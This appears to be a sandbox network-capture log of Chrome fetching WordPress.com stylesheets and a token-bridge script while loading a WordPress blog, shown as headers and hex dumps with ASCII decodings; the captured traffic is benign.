                                                                                                                                                                                                                                                                  2024-10-29 19:09:41 UTC1369INData Raw: 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 22 53 65 67 6f 65 20 55 49 22 2c 52 6f 62 6f 74 6f 2c 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 55 62 75 6e 74 75 2c 43 61 6e 74 61 72 65 6c 6c 2c 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 31 70 78 20 33 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 30 38 29 2c 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 30 35 29 7d 2e 68 61 73 2d 6c 61 75 6e 63 68 2d 62 61 6e 6e 65 72 20 23 6d 61 72 6b 65 74 69 6e 67 62 61 72 2e
                                                                                                                                                                                                                                                                  Data Ascii: argin:0;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Oxygen-Sans,Ubuntu,Cantarell,"Helvetica Neue",sans-serif;font-size:14px;text-align:center;box-shadow:1px 3px rgba(0,0,0,.08),0 1px 2px rgba(0,0,0,.05)}.has-launch-banner #marketingbar.
                                                                                                                                                                                                                                                                  2024-10-29 19:09:41 UTC1369INData Raw: 64 69 75 73 3a 33 70 78 3b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 6f 70 61 63 69 74 79 20 2e 31 35 73 20 65 61 73 65 2d 6f 75 74 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 6e 6f 6e 65 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 75 74 6f 7d 2e 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 20 2e 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 2d 62 75 74 74 6f 6e 3a 68 6f 76 65 72 2c 2e 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 20 2e 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 2d 62 75 74 74 6f 6e 3a 66 6f 63 75 73 7b 6f 70 61 63 69 74 79 3a 2e 38 7d 2e 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 20 2e 6d 61 72 6b
                                                                                                                                                                                                                                                                  Data Ascii: dius:3px;-webkit-appearance:none;appearance:none;transition:opacity .15s ease-out;-webkit-font-smoothing:none;-webkit-font-smoothing:auto}.marketing-bar .marketing-bar-button:hover,.marketing-bar .marketing-bar-button:focus{opacity:.8}.marketing-bar .mark
                                                                                                                                                                                                                                                                  2024-10-29 19:09:41 UTC1369INData Raw: 6d 69 6e 2d 62 61 72 2e 68 61 73 2d 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 3e 5b 69 64 5d 7b 73 63 72 6f 6c 6c 2d 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 7d 7d 40 6d 65 64 69 61 20 70 72 69 6e 74 7b 23 6d 61 72 6b 65 74 69 6e 67 62 61 72 2e 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 34 38 30 70 78 29 7b 2e 68 61 73 2d 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 2d 74 68 65 6d 65 2d 74 77 65 6e 74 79 2d 74 77 65 6e 74 79 2d 6f 6e 65 20 2e 70 72 69 6d 61 72 79 2d 6e 61
                                                                                                                                                                                                                                                                  Data Ascii: min-bar.has-marketing-bar .entry-content>[id]{scroll-margin-top:0}}@media print{#marketingbar.marketing-bar{display:none!important}html{margin-top:0!important}}@media only screen and (max-width:480px){.has-marketing-bar-theme-twenty-twenty-one .primary-na
                                                                                                                                                                                                                                                                  2024-10-29 19:09:41 UTC1369INData Raw: 79 20 2e 68 65 61 64 65 72 2d 77 72 61 70 70 65 72 7b 74 6f 70 3a 76 61 72 28 2d 2d 77 70 2d 61 64 6d 69 6e 2d 2d 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 2d 2d 68 65 69 67 68 74 29 7d 2e 68 61 73 2d 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 2d 74 68 65 6d 65 2d 61 66 66 69 6e 69 74 79 2e 61 64 6d 69 6e 2d 62 61 72 20 2e 68 65 61 64 65 72 2d 77 72 61 70 70 65 72 7b 74 6f 70 3a 76 61 72 28 2d 2d 77 70 2d 61 64 6d 69 6e 2d 2d 61 64 6d 69 6e 2d 62 61 72 2d 2d 68 65 69 67 68 74 29 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 38 34 31 70 78 29 7b 2e 68 61 73 2d 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 2d 74 68 65 6d 65 2d 65 64 69 74 6f 72 20 2e 73 69 74 65 2d 68 65 61 64 65 72 7b 74 6f 70 3a 76 61 72 28 2d 2d 77 70 2d 61 64 6d 69 6e 2d 2d 6d 61 72 6b
                                                                                                                                                                                                                                                                  Data Ascii: y .header-wrapper{top:var(--wp-admin--marketing-bar--height)}.has-marketing-bar-theme-affinity.admin-bar .header-wrapper{top:var(--wp-admin--admin-bar--height)}}@media (min-width:841px){.has-marketing-bar-theme-editor .site-header{top:var(--wp-admin--mark
                                                                                                                                                                                                                                                                  2024-10-29 19:09:41 UTC1369INData Raw: 65 6e 73 63 72 61 74 63 68 20 2e 73 69 74 65 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 63 61 6c 63 28 35 34 70 78 20 2b 20 76 61 72 28 2d 2d 77 70 2d 61 64 6d 69 6e 2d 2d 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 2d 2d 68 65 69 67 68 74 29 29 7d 7d 2e 68 61 73 2d 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 2d 74 68 65 6d 65 2d 73 70 6c 65 6e 64 69 6f 20 23 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 63 61 6c 63 28 31 2e 37 72 65 6d 20 2b 20 76 61 72 28 2d 2d 77 70 2d 61 64 6d 69 6e 2d 2d 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 2d 2d 68 65 69 67 68 74 29 29 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 37 35 65 6d 29 7b 2e 68 61 73 2d 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 2d 74 68 65 6d 65 2d 73 6b 65 74 63 68 20
                                                                                                                                                                                                                                                                  Data Ascii: enscratch .site{margin-top:calc(54px + var(--wp-admin--marketing-bar--height))}}.has-marketing-bar-theme-splendio #wrapper{margin-top:calc(1.7rem + var(--wp-admin--marketing-bar--height))}@media screen and (min-width:75em){.has-marketing-bar-theme-sketch
                                                                                                                                                                                                                                                                  2024-10-29 19:09:41 UTC31INData Raw: 2d 2d 77 70 2d 61 64 6d 69 6e 2d 2d 61 64 6d 69 6e 2d 62 61 72 2d 2d 68 65 69 67 68 74 29 7d
                                                                                                                                                                                                                                                                  Data Ascii: --wp-admin--admin-bar--height)}


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  2192.168.2.1649707192.0.77.324437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:41 UTC718OUTGET /_static/??/wp-content/mu-plugins/core-compat/wp-mediaelement.css,/wp-content/mu-plugins/wpcom-bbpress-premium-themes.css?m=1432920480j&cssminify=yes HTTP/1.1
                                                                                                                                                                                                                                                                  Host: s1.wp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  Origin: https://dartergary.wordpress.com
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                  Referer: https://dartergary.wordpress.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:41 UTC457INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:41 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/css;charset=utf-8
                                                                                                                                                                                                                                                                  Content-Length: 369
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Last-Modified: Fri, 19 May 2023 01:49:07 GMT
                                                                                                                                                                                                                                                                  Etag: "6466d593-171"
                                                                                                                                                                                                                                                                  Expires: Fri, 24 Jan 2025 00:06:41 GMT
                                                                                                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                  X-ac: 4.dfw _dfw MISS
                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  X-nc: HIT dfw 1
                                                                                                                                                                                                                                                                  2024-10-29 19:09:41 UTC369INData Raw: 2e 77 70 2d 70 6c 61 79 6c 69 73 74 2d 6c 69 67 68 74 7b 63 6f 6c 6f 72 3a 23 30 30 30 7d 2e 77 70 2d 70 6c 61 79 6c 69 73 74 2d 6c 69 67 68 74 20 2e 77 70 2d 70 6c 61 79 6c 69 73 74 2d 69 74 65 6d 7b 63 6f 6c 6f 72 3a 23 33 33 33 7d 2e 77 70 2d 70 6c 61 79 6c 69 73 74 2d 6c 69 67 68 74 20 2e 77 70 2d 70 6c 61 79 6c 69 73 74 2d 70 6c 61 79 69 6e 67 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 7d 2e 77 70 2d 70 6c 61 79 6c 69 73 74 2d 64 61 72 6b 20 2e 77 70 2d 70 6c 61 79 6c 69 73 74 2d 69 74 65 6d 20 2e 77 70 2d 70 6c 61 79 6c 69 73 74 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 77 70 2d 70 6c 61 79 6c 69 73 74 2d 63 61 70 74 69 6f 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 62 62 70 2d 73 74
                                                                                                                                                                                                                                                                  Data Ascii: .wp-playlist-light{color:#000}.wp-playlist-light .wp-playlist-item{color:#333}.wp-playlist-light .wp-playlist-playing{background:#fff;color:#000}.wp-playlist-dark .wp-playlist-item .wp-playlist-caption{color:#fff}.wp-playlist-caption{display:block}.bbp-st


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  3192.168.2.1649709192.0.77.324437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC711OUTGET /_static/??-eJzTLy/QTc7PK0nNK9HPLdUtyClNz8wr1i9KTcrJTwcy0/WTi5G5ekCujj52Temp+bo5+cmJJZn5eSgc3bScxMwikFb7XFtDE1NLExMLc0OTLACohS2q&cssminify=yes HTTP/1.1
                                                                                                                                                                                                                                                                  Host: s1.wp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  Origin: https://dartergary.wordpress.com
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                  Referer: https://dartergary.wordpress.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC483INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:42 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/css;charset=utf-8
                                                                                                                                                                                                                                                                  Content-Length: 2395
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Last-Modified: Fri, 19 May 2023 01:49:07 GMT
                                                                                                                                                                                                                                                                  Etag: "6466d593-95b"
                                                                                                                                                                                                                                                                  Expires: Thu, 04 Sep 2025 01:50:07 GMT
                                                                                                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                  X-ac: 4.dfw _dfw BYPASS
                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  X-nc: HIT dfw 1
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC886INData Raw: 2e 72 65 62 6c 6f 67 67 65 72 2d 6e 6f 74 65 20 69 6d 67 2e 61 76 61 74 61 72 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 7d 2e 72 65 62 6c 6f 67 67 65 72 2d 6e 6f 74 65 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 32 30 70 78 7d 2e 77 70 63 6f 6d 2d 72 65 62 6c 6f 67 2d 73 6e 61 70 73 68 6f 74 20 2e 72 65 62 6c 6f 67 2d 66 72 6f 6d 20 69 6d 67 7b 6d 61 72 67 69 6e 3a 30 20 2e 37 35 65 6d 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 7d 2e 77 70 63 6f 6d 2d 72 65 62 6c 6f 67 2d 73 6e 61 70 73 68 6f 74 20 2e 72 65 62 6c 6f 67 67 65 72 2d 6e 6f 74 65 20 69 6d 67 2e 61 76 61 74 61 72 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b
                                                                                                                                                                                                                                                                  Data Ascii: .reblogger-note img.avatar{float:left;padding:0;border:0}.reblogger-note-content{margin:0 0 20px}.wpcom-reblog-snapshot .reblog-from img{margin:0 .75em 0 0;padding:0;border:0}.wpcom-reblog-snapshot .reblogger-note img.avatar{float:left;padding:0;border:0;
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC1369INData Raw: 2d 70 6f 73 74 20 2e 77 70 63 6f 6d 2d 65 6e 68 61 6e 63 65 64 2d 65 78 63 65 72 70 74 7b 63 6c 65 61 72 3a 62 6f 74 68 7d 2e 72 65 62 6c 6f 67 2d 70 6f 73 74 20 2e 77 70 63 6f 6d 2d 65 6e 68 61 6e 63 65 64 2d 65 78 63 65 72 70 74 20 61 64 64 72 65 73 73 2c 2e 72 65 62 6c 6f 67 2d 70 6f 73 74 20 2e 77 70 63 6f 6d 2d 65 6e 68 61 6e 63 65 64 2d 65 78 63 65 72 70 74 20 6c 69 2c 2e 72 65 62 6c 6f 67 2d 70 6f 73 74 20 2e 77 70 63 6f 6d 2d 65 6e 68 61 6e 63 65 64 2d 65 78 63 65 72 70 74 20 68 31 2c 2e 72 65 62 6c 6f 67 2d 70 6f 73 74 20 2e 77 70 63 6f 6d 2d 65 6e 68 61 6e 63 65 64 2d 65 78 63 65 72 70 74 20 68 32 2c 2e 72 65 62 6c 6f 67 2d 70 6f 73 74 20 2e 77 70 63 6f 6d 2d 65 6e 68 61 6e 63 65 64 2d 65 78 63 65 72 70 74 20 68 33 2c 2e 72 65 62 6c 6f 67 2d 70
                                                                                                                                                                                                                                                                  Data Ascii: -post .wpcom-enhanced-excerpt{clear:both}.reblog-post .wpcom-enhanced-excerpt address,.reblog-post .wpcom-enhanced-excerpt li,.reblog-post .wpcom-enhanced-excerpt h1,.reblog-post .wpcom-enhanced-excerpt h2,.reblog-post .wpcom-enhanced-excerpt h3,.reblog-p
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC140INData Raw: 75 6f 74 65 20 70 3a 6c 61 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 67 65 6f 6c 6f 63 61 74 69 6f 6e 2d 63 68 69 70 20 2e 6e 6f 74 69 63 6f 6e 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 2e 67 65 6f 6c 6f 63 61 74 69 6f 6e 2d 63 68 69 70 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 65 6d 7d
                                                                                                                                                                                                                                                                  Data Ascii: uote p:last-child{margin-bottom:0}.geolocation-chip .noticon{display:inline-block;vertical-align:middle}.geolocation-chip{margin-bottom:1em}


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  4192.168.2.1649711192.0.77.324437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC720OUTGET /_static/??/wp-content/js/rlt-proxy.js,/wp-content/mu-plugins/jetpack-plugin/sun/jetpack_vendor/automattic/jetpack-videopress/build/lib/token-bridge.js?m=1724856138j HTTP/1.1
                                                                                                                                                                                                                                                                  Host: s0.wp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  Origin: https://dartergary.wordpress.com
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                  Referer: https://dartergary.wordpress.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC482INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:42 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/javascript
                                                                                                                                                                                                                                                                  Content-Length: 15575
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Last-Modified: Wed, 28 Aug 2024 14:42:34 GMT
                                                                                                                                                                                                                                                                  Etag: "66cf375a-3cd7"
                                                                                                                                                                                                                                                                  Expires: Thu, 28 Aug 2025 15:00:15 GMT
                                                                                                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                  X-ac: 4.dfw _dfw HIT
                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  X-nc: HIT dfw 1
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC887INData Raw: 2f 2f 20 6c 69 73 74 65 6e 20 66 6f 72 20 72 6c 74 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 65 76 65 6e 74 73 20 61 6e 64 20 70 61 73 73 20 74 68 65 6d 20 74 6f 20 63 68 69 6c 64 72 65 6e 20 6f 66 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 0a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 76 61 72 20 63 75 72 72 65 6e 74 54 6f 6b 65 6e 3b 0a 09 76 61 72 20 70 61 72 65 6e 74 4f 72 69 67 69 6e 3b 0a 09 76 61 72 20 69 66 72 61 6d 65 4f 72 69 67 69 6e 73 3b 0a 09 76 61 72 20 72 65 67 69 73 74 65 72 65 64 49 66 72 61 6d 65 73 20 3d 20 5b 5d 3b 0a 09 76 61 72 20 69 6e 69 74 69 61 6c 69 7a 61 74 69 6f 6e 4c 69 73 74 65 6e 65 72 73 20 3d 20 5b 5d 3b 0a 09 76 61 72 20 68 61 73 42 65 65 6e 49 6e 69 74 69 61 6c 69 7a 65 64 20 3d 20 66 61 6c 73 65 3b 0a 09
                                                                                                                                                                                                                                                                  Data Ascii: // listen for rlt authentication events and pass them to children of this document.( function() {var currentToken;var parentOrigin;var iframeOrigins;var registeredIframes = [];var initializationListeners = [];var hasBeenInitialized = false;
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC1369INData Raw: 20 50 55 42 4c 49 43 20 4d 45 54 48 4f 44 53 0a 09 20 2a 2f 0a 09 77 69 6e 64 6f 77 2e 72 6c 74 49 6e 76 61 6c 69 64 61 74 65 54 6f 6b 65 6e 20 3d 20 66 75 6e 63 74 69 6f 6e 28 20 74 6f 6b 65 6e 2c 20 73 6f 75 72 63 65 4f 72 69 67 69 6e 20 29 20 7b 0a 09 09 2f 2f 20 69 6e 76 61 6c 69 64 61 74 65 20 69 6e 20 63 75 72 72 65 6e 74 20 63 6f 6e 74 65 78 74 0a 09 09 69 66 20 28 20 74 6f 6b 65 6e 20 3d 3d 3d 20 63 75 72 72 65 6e 74 54 6f 6b 65 6e 20 29 20 7b 0a 09 09 09 63 75 72 72 65 6e 74 54 6f 6b 65 6e 20 3d 20 6e 75 6c 6c 3b 0a 09 09 7d 0a 0a 09 09 2f 2f 20 72 65 6d 6f 76 65 20 66 72 6f 6d 20 6c 6f 63 61 6c 73 74 6f 72 61 67 65 2c 20 62 75 74 20 6f 6e 6c 79 20 69 66 20 69 6e 20 61 20 74 6f 70 20 6c 65 76 65 6c 20 77 69 6e 64 6f 77 2c 20 6e 6f 74 20 69 66 72
                                                                                                                                                                                                                                                                  Data Ascii: PUBLIC METHODS */window.rltInvalidateToken = function( token, sourceOrigin ) {// invalidate in current contextif ( token === currentToken ) {currentToken = null;}// remove from localstorage, but only if in a top level window, not ifr
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC1369INData Raw: 0a 09 09 09 7d 20 63 61 74 63 68 20 28 20 65 72 72 20 29 20 7b 0a 09 09 09 09 72 65 74 75 72 6e 3b 0a 09 09 09 7d 0a 09 09 7d 0a 09 7d 3b 0a 0a 09 77 69 6e 64 6f 77 2e 72 6c 74 49 73 41 75 74 68 65 6e 74 69 63 61 74 65 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 09 72 65 74 75 72 6e 20 21 21 20 63 75 72 72 65 6e 74 54 6f 6b 65 6e 3b 0a 09 7d 3b 0a 0a 09 77 69 6e 64 6f 77 2e 72 6c 74 47 65 74 54 6f 6b 65 6e 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 09 72 65 74 75 72 6e 20 63 75 72 72 65 6e 74 54 6f 6b 65 6e 3b 0a 09 7d 3b 0a 0a 09 77 69 6e 64 6f 77 2e 72 6c 74 41 64 64 49 6e 69 74 69 61 6c 69 7a 61 74 69 6f 6e 4c 69 73 74 65 6e 65 72 20 3d 20 66 75 6e 63 74 69 6f 6e 28 20 6c 69 73 74 65 6e 65 72 20 29 20 7b 0a 09 09 2f 2f 20 69 66 20 52
                                                                                                                                                                                                                                                                  Data Ascii: } catch ( err ) {return;}}};window.rltIsAuthenticated = function() {return !! currentToken;};window.rltGetToken = function() {return currentToken;};window.rltAddInitializationListener = function( listener ) {// if R
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC1369INData Raw: 6f 62 61 62 6c 79 20 62 6c 6f 63 6b 65 64 20 74 68 69 72 64 2d 70 61 72 74 79 20 61 63 63 65 73 73 22 2c 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 0a 09 09 7d 0a 0a 09 09 2f 2f 20 6c 69 73 74 65 6e 20 66 6f 72 20 52 4c 54 20 65 76 65 6e 74 73 20 66 72 6f 6d 20 61 70 70 72 6f 76 65 64 20 6f 72 69 67 69 6e 73 0a 09 09 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 20 27 6d 65 73 73 61 67 65 27 2c 20 66 75 6e 63 74 69 6f 6e 28 20 65 20 29 20 7b 0a 09 09 09 76 61 72 20 6d 65 73 73 61 67 65 20 3d 20 65 20 26 26 20 65 2e 64 61 74 61 3b 0a 09 09 09 69 66 20 28 20 74 79 70 65 6f 66 20 6d 65 73 73 61 67 65 20 3d 3d 3d 20 27 73 74 72 69 6e 67 27 20 29 20 7b 0a 09 09 09 09 74 72 79 20 7b 0a 09 09 09 09 09 6d 65 73
                                                                                                                                                                                                                                                                  Data Ascii: obably blocked third-party access", window.location.href);}// listen for RLT events from approved originswindow.addEventListener( 'message', function( e ) {var message = e && e.data;if ( typeof message === 'string' ) {try {mes
                                                                                                                                                                                                                                                                  2024-10-29 19:09:42 UTC1369INData Raw: 63 75 72 72 65 6e 74 54 6f 6b 65 6e 20 29 20 7b 0a 09 09 09 09 09 09 09 72 6c 74 49 6e 6a 65 63 74 54 6f 6b 65 6e 28 20 63 75 72 72 65 6e 74 54 6f 6b 65 6e 2c 20 65 2e 73 6f 75 72 63 65 2c 20 65 2e 6f 72 69 67 69 6e 20 29 3b 0a 09 09 09 09 09 09 7d 0a 09 09 09 09 09 7d 0a 09 09 09 09 7d 0a 09 09 09 7d 0a 09 09 7d 20 29 3b 0a 0a 09 09 69 6e 69 74 69 61 6c 69 7a 61 74 69 6f 6e 4c 69 73 74 65 6e 65 72 73 2e 66 6f 72 45 61 63 68 28 20 66 75 6e 63 74 69 6f 6e 28 20 6c 69 73 74 65 6e 65 72 20 29 20 7b 0a 09 09 09 6c 69 73 74 65 6e 65 72 28 20 63 75 72 72 65 6e 74 54 6f 6b 65 6e 20 29 3b 0a 09 09 7d 20 29 3b 0a 0a 09 09 69 6e 69 74 69 61 6c 69 7a 61 74 69 6f 6e 4c 69 73 74 65 6e 65 72 73 20 3d 20 5b 5d 3b 0a 0a 09 09 2f 2f 20 69 6e 66 6f 72 6d 20 74 68 65 20 70
                                                                                                                                                                                                                                                                  Data Ascii: currentToken ) {rltInjectToken( currentToken, e.source, e.origin );}}}}} );initializationListeners.forEach( function( listener ) {listener( currentToken );} );initializationListeners = [];// inform the p
